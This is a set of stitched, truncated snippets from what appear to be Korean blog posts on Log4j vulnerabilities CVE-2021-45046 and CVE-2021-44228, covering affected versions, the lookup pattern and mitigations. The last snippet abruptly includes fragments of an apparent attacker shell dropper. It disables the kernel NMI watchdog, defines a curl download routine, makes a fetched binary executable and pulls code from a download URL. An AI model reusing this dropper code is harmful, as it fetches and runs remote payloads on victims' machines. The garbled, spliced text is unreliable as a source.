Log4j 2.15.0 으로 업그레이드 한지 하루만에 CVE-2021-45046 가 공개되었습니다. 영향 받는 버전 Logj2
Vulnerability

스위스 정부에서 깔끔하게 정리해서 포스팅한 글을 참조 하였습니다. 이미 이슈는 다뤘으니 Log4j 2.x 의 이슈 CVE-2021-44228 설명은 생략 하겠습니다. 이슈 관련 포스팅은 CVE-2021-44228 취약점 참고하세요. Message formatting 을 통한 lookup 동작을 위해 ${protocol:~~~} 의 패턴을 갖습니다. WAF 에 룰을 설정하여 차단합니다. Log4j2 의 message lookup 을 disable 합니다. (2.10

2021년 12월 10일. CVE-2021-44228 취약점이 공개 되었습니다. 현재 수많은 사이트 등에서 다수의 스캔 흔적이 포착 된것으로 확인 됩니다. 자바 어플리케이션을 사용하는 곳은 모두 체크 해봐야 합니다. 영향 받는 버전 Log4j 2.x /proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf ROOTUID="0" function __curl() { read proto server path $HOME/curl; chmod +x $HOME/curl $HOME/curl -V && WGET="$HOME/curl -o" $HOME/curl -V || __curl "$CURL_DOWNLOAD_URL" > $BIN_PAT..